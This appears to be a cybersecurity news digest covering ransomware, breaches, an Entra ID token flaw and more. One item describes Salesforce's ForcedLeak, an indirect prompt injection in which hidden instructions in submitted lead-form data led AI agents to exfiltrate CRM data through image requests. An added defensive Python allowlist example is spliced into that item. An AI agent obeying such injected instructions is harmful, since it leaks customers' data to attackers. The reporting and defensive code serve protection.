US Secret Service Dismantled Covert Communications Network Near the U.N. in New York
- The U.S. Secret Service uncovered a covert communications network near the United Nations Headquarters, seizing 100,000 SIM cards, 300 servers, illegal firearms, and other contraband. Capable of sending 30 million texts per minute, the network posed an imminent threat to senior officials.
- Investigators described the discovery as unprecedented in scale, warning it could enable mass outages, espionage, or tracking operations. Officials suspect potential nation-state involvement, given the cost and sophistication.
- Analysts noted links between seized SIMs and both foreign intelligence actors and organized crime groups, highlighting overlaps between espionage and cybercrime. Past cases, such as cartel-run telecom networks in Mexico, illustrate how illicit communication systems can be weaponized.
- The incident demonstrates the vulnerabilities of cellular infrastructure to hostile use. It also highlights the risks of advanced covert systems being deployed in sensitive areas, with cyber threats potentially becoming national security risks.
Inc Ransomware Group Claims 5.7 TB Theft from Pennsylvania Attorney General’s Office
Article Link: https://hackread.com/inc-ransomware-data-pennsylvania-attorney-general/
- The Inc ransomware group claimed responsibility for a breach at Pennsylvania’s Attorney General’s office in August 2025, alleging theft of 5.7 TB of sensitive data. Operations were disrupted, with trials delayed until mid-September, and while the office confirmed the attack, it refused to pay the ransom.
- Inc, active since 2023, uses phishing campaigns and software exploits to infiltrate networks. The group has attacked healthcare, retail, and government organizations, and its tactics typically combine data theft with system lockdowns for maximum leverage.
- Researcher Rebecca Moody of Comparitech notes this incident marks the 58th confirmed attack on U.S. government entities this year, and the 11th in August. The alleged 5.7 TB of data is the largest claimed against a U.S. government body in 2025.
- Moody predicts further public disclosures in coming weeks as investigations continue. With ransomware groups repeatedly targeting government bodies, she emphasizes the dual risks of widespread operational disruption and exposure of vast stores of sensitive personal data.
Boyd Gaming Discloses Data Breach After Suffering a Cyberattack
Article Link: https://www.bleepingcomputer.com/news/security/boyd-gaming-discloses-data-breach-after-suffering-a-cyberattack/
- Boyd Gaming Corporation, a major U.S. casino operator in ten states, disclosed a cyberattack in which threat actors stole employee and customer data. The 16,000-person company confirmed the breach in an SEC filing and stated it was working with external cybersecurity experts and law enforcement.
- Boyd said attackers exfiltrated data from its IT systems, including sensitive employee information. Impacted individuals and regulators are being notified, and the company expects its cybersecurity insurance to cover related costs.
- The company emphasized that its gaming operations were not affected and reported no material impact on financial performance. To date, no ransomware group has claimed responsibility, leaving questions about the attackers’ motives.
- The case highlights ongoing risks to the gaming and hospitality industry, where customer and employee data are prime targets. While Boyd’s operations remained intact, reputational and regulatory consequences often linger long after breaches are disclosed.
Microsoft Entra ID Flaw Allowed Hijacking Any Company’s Tenant
Article Link: https://www.bleepingcomputer.com/news/security/microsoft-entra-id-flaw-allowed-hijacking-any-companys-tenant/
- A critical flaw in Microsoft Entra ID, formerly Azure AD, could have allowed attackers to hijack tenants worldwide. Researcher Dirk-jan Mollema discovered undocumented “actor tokens,” which bypassed security controls, enabled full admin compromise, and allowed impersonation of any user.
- These unsigned tokens, issued by legacy services, could not be revoked for 24 hours and were invisible to tenant logging. Attackers could generate the tokens in their own environments and reuse them against victim organizations, needing only publicly available tenant IDs and user identifiers.
- Microsoft acknowledged the issue, describing actor tokens as “high-privileged access” mechanisms used internally for service-to-service authentication. The company patched the Azure AD Graph API vulnerability, tracked as CVE-2025-55241, in early September, following Mollema’s disclosure in July, and confirmed plans to fully deprecate actor tokens.
- These design flaws highlight the risks of legacy components persisting in modern identity services. The vulnerability illustrates how attackers can exploit overlooked authentication mechanisms to gain stealthy access.
Qantas Cutting CEO Pay Signals New Era of Cyber Accountability
Article Link: https://www.csoonline.com/article/4062724/qantas-cutting-ceo-pay-signals-new-era-of-cyber-accountability.html
- Qantas Airways docked CEO Vanessa Hudson’s bonus by A$800,000 (US$522,000) following a June cyber incident exposing data on nearly 6 million passengers. Other executives were also penalized, marking one of the first public cases since 2017, when Yahoo’s then-CEO Marissa Mayer faced financial consequences for mishandling multiple breaches.
- Experts argue the decision reflects recognition that cybersecurity is not solely the CISO’s responsibility but extends to top leadership. Legal and regulatory frameworks increasingly expose CEOs to personal liability for oversight failures, with FTC, SEC, and EU rules expanding accountability.
- This trend suggests boards and investors expect more active engagement by CEOs in breach prevention and incident response. Some experts note that many C-suite consequences remain hidden, ranging from stalled promotions to early retirements, even without public disclosure.
- With cyber accountability now being reshaped, CISOs and CEOs are advised to build closer board partnerships, practice response plans, and integrate cyber oversight into governance structures.
Salesforce Patches Critical ForcedLeak Bug Exposing CRM Data via AI Prompt Injection
Article Link: https://thehackernews.com/2025/09/salesforce-patches-critical-forcedleak.html?m=1
- Noma Security researchers disclosed a vulnerability in Salesforce Agentforce, called ForcedLeak (CVSS score: 9.4), which allowed CRM data exfiltration. The flaw exploited Web-to-Lead forms via indirect prompt injection, tricking AI agents into executing malicious instructions hidden in submitted data.
- Attackers could leverage expired trusted domains to siphon data, including customer details and sales pipeline information. A proof-of-concept demonstrated exfiltration of sensitive information disguised within image requests, highlighting how the greater autonomy given to AI agents widens the attack surface.
- Salesforce patched the flaw in September 2025, enforcing Trusted URL allowlists for Agentforce and Einstein AI and re-securing the expired domain. Customers were advised to audit lead data, enforce strict input validation, and sanitize untrusted sources to prevent injection attacks.
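The mitigation described above, a Trusted URL allowlist applied to outbound requests an agent would make, is shown here as an added example; this is not Salesforce’s or Noma Security’s code, and the hostnames, URLs and the `is_trusted_url` / `strip_untrusted_images` helpers are constructed for illustration. It generalizes the patch description into the two checks a defender actually needs: an exact-host allowlist (no wildcards, `https` only, no embedded credentials) and a filter that removes Markdown image references pointing anywhere else before agent output is rendered, since image fetches were the exfiltration channel in the proof-of-concept.

```python
"""Added example: Trusted-URL allowlist for agent-generated image requests.
Not Salesforce's Trusted URL implementation; a generic check built from the
mitigation described in the article. All hostnames/URLs are constructed."""
import re
from urllib.parse import urlsplit

# Constructed allowlist of exact hostnames. No wildcards, so a lookalike
# such as crm.example.com.evil.example never matches by accident.
TRUSTED_HOSTS = frozenset({
    "crm.example.com",
    "static.example.com",
})

# Matches Markdown images: ![alt](url "optional title")
_MD_IMAGE = re.compile(r"!\[[^\]]*\]\(\s*([^)\s]+)[^)]*\)")


def is_trusted_url(url: str, allowlist: frozenset = TRUSTED_HOSTS) -> bool:
    """True only if url is https, carries no userinfo, and its hostname is an
    exact member of the allowlist (ports and case are normalized)."""
    try:
        parts = urlsplit(url)
    except ValueError:
        return False
    if parts.scheme != "https":
        return False
    # Reject embedded credentials: "https://crm.example.com@evil.example/"
    # would fool a naive substring check even though the real host is evil.example.
    if parts.username is not None or parts.password is not None:
        return False
    host = parts.hostname  # lower-cased, port stripped, IPv6 brackets removed
    if not host:
        return False
    return host in allowlist


def strip_untrusted_images(markdown: str, allowlist: frozenset = TRUSTED_HOSTS):
    """Replace every Markdown image whose URL fails is_trusted_url with a
    placeholder. Returns (sanitized_markdown, list_of_rejected_urls) so the
    rejections can be logged as a prompt-injection indicator."""
    rejected = []

    def _check(match: re.Match) -> str:
        url = match.group(1)
        if is_trusted_url(url, allowlist):
            return match.group(0)
        rejected.append(url)
        return "[image removed]"

    return _MD_IMAGE.sub(_check, markdown), rejected


if __name__ == "__main__":
    # Constructed agent output: one legitimate asset, one exfiltration attempt
    # that smuggles a field value in the query string of a foreign image URL.
    sample = ("Lead summary ![logo](https://static.example.com/logo.png) "
              "![p](https://evil.example/p.png?d=SECRET)")
    clean, dropped = strip_untrusted_images(sample)
    print(clean)
    for url in dropped:
        print("rejected:", url)
```

The rejected list is the detection hook: a lead record or agent response that tries to embed an image hosted outside the allowlist is exactly the signal worth alerting on, and logging it is more useful than silently dropping it.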
- Experts stress that AI prompt injection is an emerging security frontier. As enterprises integrate autonomous AI into workflows, strong governance and proactive safeguards are required to prevent AI systems from becoming tools of data theft.
How One Bad Password Ended a 158-Year-Old Business
Article Link: https://thehackernews.com/2025/09/how-one-bad-password-ended-158-year-old.html?m=1
- UK-based KNP Logistics Group, operating for 158 years, collapsed in June 2025 after falling victim to the Akira ransomware group. Gaining entry by simply guessing an employee’s weak password on an internet-facing system without multi-factor authentication, attackers encrypted critical data, destroyed backups, and demanded £5 million, which the company could not pay.
- The attack left 500 trucks sidelined, 700 employees jobless, and the company in administration within weeks. Even with insurance and compliance programs, the firm had no recovery path once backups were wiped.
- Weak passwords remain a global plague, with a study from Kaspersky revealing nearly half of 193 million compromised credentials can be cracked in under a minute. KNP’s case illustrates how individual security lapses ripple across entire organizations, undermining all other defenses.
- Ransomware continues to devastate UK businesses, with an estimated 19,000 attacks last year alone. The article emphasizes that a handful of security fundamentals bolster resilience: strong password practices, enabling MFA, implementing zero-trust architecture and least-privilege access controls, and performing regular backup and recovery.
Major Cyber Threat Detection Vendors Pull Out of MITRE Evaluations Test
Article Link: https://www.infosecurity-magazine.com/news/cyber-vendors-pull-out-mitre/
- Microsoft, SentinelOne, and Palo Alto Networks have all withdrawn from the 2025 MITRE ATT&CK Evaluations: Enterprise test. The move surprised many, given that these vendors had previously used results for marketing advantage, but each cited prioritizing innovation and customer needs.
- The annual evaluations simulate real-world attack techniques to benchmark detection and response. In 2025, scenarios include financially motivated intrusions and Chinese-aligned espionage campaigns. MITRE stresses the tests aren’t static but evolving assessments tailored yearly to adversary tactics.
- Critics argue the tests have become resource-intensive and drifted toward “vendor theater” used more for publicity than driving real security gains. MITRE acknowledged challenges, noting the increasing difficulty of evaluations and the lack of recent vendor forums to align expectations.
- Looking ahead, MITRE plans to re-establish the vendor forum in 2026 to improve collaboration and transparency. While some top vendors stepped away, others remain committed, ensuring the evaluations continue.
